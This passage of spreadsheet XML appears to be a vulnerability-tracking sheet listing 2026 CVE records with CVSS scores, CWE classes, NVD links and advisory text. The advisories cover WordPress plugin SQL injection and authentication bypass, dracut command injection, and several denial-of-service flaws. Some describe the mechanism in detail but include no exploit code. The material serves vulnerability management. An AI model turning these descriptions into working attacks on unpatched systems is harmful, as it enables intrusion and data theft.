      <c r="G2507" s="5" t="inlineStr"/>
      <c r="H2507" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2507" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2507" s="5" t="inlineStr"/>
      <c r="K2507" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-770</t>
        </is>
      </c>
      <c r="L2507" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).
This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1.</t>
        </is>
      </c>
      <c r="M2507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1519</t>
        </is>
      </c>
    </row>
    <row r="2508">
      <c r="A2508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="C2508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2508" s="5" t="inlineStr"/>
      <c r="F2508" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2508" s="5" t="inlineStr"/>
      <c r="H2508" s="5" t="inlineStr"/>
      <c r="I2508" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2508" s="5" t="inlineStr"/>
      <c r="K2508" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L2508"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custom-level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M2508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="2509">
      <c r="A2509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15462</t>
        </is>
      </c>
      <c r="C2509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2509" s="5" t="inlineStr"/>
      <c r="F2509" s="5" t="inlineStr"/>
      <c r="G2509" s="5" t="inlineStr"/>
      <c r="H2509" s="5" t="inlineStr"/>
      <c r="I2509" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2509" s="5" t="inlineStr"/>
      <c r="K2509" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2509" s="5" t="inlineStr">
        <is>
          <t>The Sticky Chat Widget plugin for WordPress is vulnerable to SQL Injection via the 'scw_form_fields' parameter array keys of the 'scw_save_form_data' AJAX action in versions up to, and including, 1.4.2. This is due to the save_form_data() function passing attacker-controlled POST array keys unsanitized to $wpdb-&gt;insert(), which wraps column identifiers in backticks without escaping them, allowing a backtick in an attacker-supplied key to break out of the column-identifier list into raw SQL; additionally, the use of filter_input() bypasses WordPress's wp_magic_quotes() protection, and the widget_id validation loop is skipped entirely when no valid widget_id is supplied, leaving $isValid at 1. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="M2509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15462</t>
        </is>
      </c>
    </row>
    <row r="2510">
      <c r="A2510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15667</t>
        </is>
      </c>
      <c r="C2510" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2510" s="5" t="inlineStr"/>
      <c r="F2510" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2510" s="5" t="inlineStr"/>
      <c r="H2510" s="5" t="inlineStr"/>
      <c r="I2510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2510" s="5" t="inlineStr"/>
      <c r="K2510" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L2510"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contributor-level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 The etn_manage_event capability is assigned to Contributors by default, meaning any Contributor-level user can set the malicious event_layout value via the REST API without any additional configuration.</t>
        </is>
      </c>
      <c r="M2510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15667</t>
        </is>
      </c>
    </row>
    <row r="2511">
      <c r="A2511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15816</t>
        </is>
      </c>
      <c r="C2511" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2511" s="5" t="inlineStr"/>
      <c r="F2511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2511" s="5" t="inlineStr"/>
      <c r="H2511" s="5" t="inlineStr"/>
      <c r="I2511" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2511" s="5" t="inlineStr"/>
      <c r="K2511" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2511" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in dracut. The die() error-handling function writes its message into a shell script under the initramfs emergency-hook directory without properly shell-quoting it. When the message contains data derived from the DHCP ROOT_PATH option, an attacker on the adjacent network who controls a rogue DHCP server can inject a command-substitution sequence that executes as root the next time dracut sources its emergency hook scripts during standard boot-failure handling.</t>
        </is>
      </c>
      <c r="M2511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15816</t>
        </is>
      </c>
    </row>
    <row r="2512">
      <c r="A2512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16025</t>
        </is>
      </c>
      <c r="C2512" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2512" s="5" t="inlineStr"/>
      <c r="F2512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2512" s="5" t="inlineStr"/>
      <c r="H2512" s="5" t="inlineStr"/>
      <c r="I2512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2512" s="5" t="inlineStr"/>
      <c r="K2512" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L2512" s="5" t="inlineStr">
        <is>
          <t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M2512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t>
        </is>
      </c>
    </row>
    <row r="2513">
      <c r="A2513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16028</t>
        </is>
      </c>
      <c r="C2513" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2513" s="5" t="inlineStr"/>
      <c r="F2513" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2513" s="5" t="inlineStr"/>
      <c r="H2513" s="5" t="inlineStr"/>
      <c r="I2513" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2513" s="5" t="inlineStr"/>
      <c r="K2513" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2513" s="5" t="inlineStr">
        <is>
          <t>Protocol::HTTP2 versions before 1.14 for Perl allow memory exhaustion via closed streams that stream_state never removes from the connection stream table.
When a stream reaches the CLOSED state, stream_state returns the concurrency slot and clears most of the stream's keys, but the entry itself stays in the connection stream table and nothing in the distribution removes it. Stream identifiers increase monotonically, so a peer can open and close streams on one connection indefinitely, each close leaving a residual entry that is retained for the life of the connection.
SETTINGS_MAX_CONCURRENT_STREAMS does not bound this. That setting caps how many streams are live at once and is enforced, while the growth is made of streams the cap has already released, so it accumulates with concurrency never exceeding one. The client keeps the same table and grows the same way against a hostile server.
Measured against a server built on this module, roughly 920 bytes are retained per closed stream for about 19 bytes on the wire, so 100,000 sequential streams on one connection grow server resident memory by about 88 MiB. The streams are ordinary requests that the application accepts and completes.</t>
        </is>
      </c>
      <c r="M2513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16028</t>
        </is>
      </c>
    </row>
    <row r="2514">
      <c r="A2514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16037</t>
        </is>
      </c>
      <c r="C2514" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2514" s="5" t="inlineStr"/>
      <c r="F2514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2514" s="5" t="inlineStr"/>
      <c r="H2514" s="5" t="inlineStr"/>
      <c r="I2514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2514" s="5" t="inlineStr"/>
      <c r="K2514" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L2514" s="5" t="inlineStr">
        <is>
          <t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M2514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t>
        </is>
      </c>
    </row>
    <row r="2515">
      <c r="A2515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16497</t>
        </is>
      </c>
      <c r="C2515" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2515" s="5" t="inlineStr"/>
      <c r="F2515" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2515" s="5" t="inlineStr"/>
      <c r="H2515" s="5" t="inlineStr"/>
      <c r="I2515" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2515" s="5" t="inlineStr"/>
      <c r="K2515" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L2515" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="M2515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t>
        </is>
      </c>
    </row>
    <row r="2516">
      <c r="A2516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16960</t>
        </is>
      </c>
      <c r="C2516" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2516" s="5" t="inlineStr"/>
      <c r="F2516" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2516" s="5" t="inlineStr"/>
      <c r="H2516" s="5" t="inlineStr"/>
      <c r="I2516" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2516" s="5" t="inlineStr"/>
      <c r="K2516" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2516" s="5" t="inlineStr">
        <is>
          <t>The Loops &amp; Logic WordPress plugin before 4.3.0 does not restrict its public template-data action to the data a visitor is permitted to see, allowing unauthenticated users to read arbitrary user records (including email addresses and roles) and arbitrary site options.</t>
        </is>
      </c>
      <c r="M2516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16960</t>
        </is>
      </c>
    </row>
    <row r="2517">
      <c r="A2517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17255</t>
        </is>
      </c>
      <c r="C2517" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2517" s="5" t="inlineStr"/>
      <c r="F2517" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2517" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2517" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2517" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2517" s="5" t="inlineStr"/>
      <c r="K2517" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2517" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to improper validation of the prefix length in ICMPv6 Router Advertisements.</t>
        </is>
      </c>
      <c r="M2517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17255</t>
        </is>
      </c>
    </row>
    <row r="2518">
      <c r="A2518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17470</t>
        </is>
      </c>
      <c r="C2518" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2518" s="5" t="inlineStr"/>
      <c r="F2518" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2518" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2518" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2518" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2518" s="5" t="inlineStr"/>
      <c r="K2518" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2518" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M2518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17470</t>
        </is>
      </c>
    </row>
    <row r="2519">
      <c r="A2519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18056</t>
        </is>
      </c>
      <c r="C2519" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2519" s="5" t="inlineStr"/>
      <c r="F2519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2519" s="5" t="inlineStr"/>
      <c r="H2519" s="5" t="inlineStr"/>
      <c r="I2519" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2519" s="5" t="inlineStr"/>
      <c r="K2519" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2519" s="5" t="inlineStr">
        <is>
          <t>The HivePress Authentication plugin for WordPress is vulnerable to Authentication Bypass via the access_token parameter in all versions up to, and including, 1.1.4. This is due to the authenticate_user function's Facebook authenticator resolving third-party identity by forwarding the attacker-supplied access_token to the Facebook Graph API and trusting the returned email and ID verbatim, without performing any application ID or audience validation — specifically, no /debug_token verification and no comparison of the token's app_id against the configured hp_facebook_app_id. This makes it possible for unauthenticated attackers to authenticate as any existing WordPress user, including administrators, whose email address is associated with a Facebook account for which the attacker can obtain any valid access token. Important Note: To exploit the vulnerability, the attacker must obtain the victim's access token.</t>
        </is>
      </c>
      <c r="M2519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18056</t>
        </is>
      </c>
    </row>
    <row r="2520">
      <c r="A2520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18175</t>
        </is>
      </c>
      <c r="C2520" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2520" s="5" t="inlineStr"/>
      <c r="F2520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2520" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2520" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2520" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2520" s="5" t="inlineStr"/>
      <c r="K2520" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L2520" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to manipulate database transactions due to improper authorization in the DDM target dispatcher.</t>
        </is>
      </c>
      <c r="M2520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18175</t>
        </is>
      </c>
    </row>
    <row r="2521">
      <c r="A2521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18355</t>
        </is>
      </c>
      <c r="C2521" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2521" s="5" t="inlineStr"/>
      <c r="F2521" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2521" s="5" t="inlineStr"/>
      <c r="H2521" s="5" t="inlineStr"/>
      <c r="I2521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2521" s="5" t="inlineStr"/>
      <c r="K2521" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2521" s="5" t="inlineStr">
        <is>
          <t>A heap buffer overflow flaw was found in the SASL I/O layer of 389 Directory Server (389-ds-base). In sasl_io_start_packet(), the wrapped-record length read from the wire is validated only against an upper bound. A small wire length (0, 1, or 2) produces an encrypted_buffer_count below the already-consumed encrypted_buffer_offset, causing an unsigned subtraction underflow in sasl_io_read_packet(). PR_Recv is then requested to read approximately 4 GiB into a 1024-byte heap buffer, resulting in a heap buffer overflow with attacker-controlled content. After a successful SASL bind with integrity protection (SSF &gt; 0), a remote authenticated attacker can cause a denial of service or potentially achieve remote code execution. This flaw is distinct from CVE-2026-11774, whose fix only guards against upper-bound overflow.</t>
        </is>
      </c>
      <c r="M2521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18355</t>
        </is>
      </c>
    </row>
    <row r="2522">
      <c r="A2522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18453</t>
        </is>
      </c>
      <c r="C2522" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2522" s="5" t="inlineStr"/>
      <c r="F2522" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2522" s="5" t="inlineStr"/>
      <c r="H2522" s="5" t="inlineStr"/>
      <c r="I2522" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2522" s="5" t="inlineStr"/>
      <c r="K2522" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2522" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. A missing NULL pointer check in the paged results handling of op_shared_search allows an unauthenticated remote attacker to crash the LDAP server by sending a crafted sequence of search requests using the USE_ONE_BACKEND control, resulting in denial of service.</t>
        </is>
      </c>
      <c r="M2522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18453</t>
        </is>
      </c>
    </row>
    <row r="2523">
      <c r="A2523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18561</t>
        </is>
      </c>
      <c r="C2523" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2523" s="5" t="inlineStr"/>
      <c r="F2523" s="5" t="inlineStr"/>
      <c r="G2523" s="5" t="inlineStr"/>
      <c r="H2523" s="5" t="inlineStr"/>
      <c r="I2523" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2523" s="5" t="inlineStr"/>
      <c r="K2523" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2523" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL Injection via the 'addontype' parameter in versions up to, and including, 2.0.16. This is due to insufficient escaping on the user-supplied parameter and the lack of sufficient preparation on the existing SQL query in the getWhereString() function; when the parameter is supplied as an array, element zero is used verbatim as the SQL comparison operator and concatenated into the WHERE clause without sanitization, while normalizeAjaxInputData() strips WordPress's magic_quotes protection from the value. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="M2523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18561</t>
        </is>
      </c>
    </row>
    <row r="2524">
      <c r="A2524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18611</t>
        </is>
      </c>
      <c r="C2524" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2524" s="5" t="inlineStr"/>
      <c r="F2524" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2524" s="5" t="inlineStr"/>
      <c r="H2524" s="5" t="inlineStr"/>
      <c r="I2524" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2524" s="5" t="inlineStr"/>
      <c r="K2524" s="5" t="inlineStr">
        <is>
          <t>CWE-338</t>
        </is>
      </c>
      <c r="L2524" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator. This vulnerability allows an unauthenticated attacker to derive sensitive credentials, such as MariaDB root/user passwords and MinIO access/secret keys, if they can access the MinIO Route or MariaDB Service. The flaw occurs because the operator uses a cryptographically weak pseudo-random number generator (PRNG) to generate these credentials, making them predictable. Successful exploitation could lead to unauthorized access to all pipeline artifacts and metadata, resulting in significant information disclosure.</t>
        </is>
      </c>
      <c r="M2524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18611</t>
        </is>
      </c>
    </row>
    <row r="2525">
      <c r="A2525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18649</t>
        </is>
      </c>
      <c r="C2525" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2525" s="5" t="inlineStr"/>
      <c r="F2525" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2525" s="5" t="inlineStr"/>
      <c r="H2525" s="5" t="inlineStr"/>
      <c r="I2525" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2525" s="5" t="inlineStr"/>
      <c r="K2525" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2525" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the GStreamer gst-plugins-good package. The rtph264depay and rtph265depay RTP depayloader elements do not enforce a maximum size limit on the reassembly buffer used during fragmented RTP packet processing. A remote, unauthenticated attacker can send a continuous stream of RTP fragments without ever transmitting an end-of-fragment marker, causing the reassembly buffer to grow without bound until process memory is exhausted. This results in a denial of service through process termination.</t>
        </is>
      </c>
      <c r="M2525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18649</t>
        </is>
      </c>
    </row>
    <row r="2526">
      <c r="A2526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18672</t>
        </is>
      </c>
      <c r="C2526" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2526" s="5" t="inlineStr"/>
      <c r="F2526" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2526" s="5" t="inlineStr"/>
      <c r="H2526" s="5" t="inlineStr"/>
      <c r="I2526" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2526" s="5" t="inlineStr"/>
      <c r="K2526" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2526" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient validation of client-supplied state in RadImageEditor may allow an attacker to influence which file is returned by the control's image cache, potentially exposing file contents outside the intended image directories.</t>
        </is>
      </c>
      <c r="M2526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18672</t>
        </is>
      </c>
    </row>
    <row r="2527">
      <c r="A2527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18907</t>
        </is>
      </c>
      <c r="C2527" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2527" s="5" t="inlineStr"/>
      <c r="F2527" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2527" s="5" t="inlineStr"/>
      <c r="H2527" s="5" t="inlineStr"/>
      <c r="I2527" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2527" s="5" t="inlineStr"/>
      <c r="K2527" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2527" s="5" t="inlineStr">
        <is>
          <t>Path Traversal in Download File Feature in com.talpa.hibrowser 2.23.1.1 on Android allows arbitrary file write via directory traversal sequences in the filename.</t>
        </is>
      </c>
      <c r="M2527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18907</t>
        </is>
      </c>
    </row>
    <row r="2528">
      <c r="A2528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19080</t>
        </is>
      </c>
      <c r="C2528" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2528" s="5" t="inlineStr"/>
      <c r="F2528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2528" s="5" t="inlineStr"/>
      <c r="H2528" s="5" t="inlineStr"/>
      <c r="I2528" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
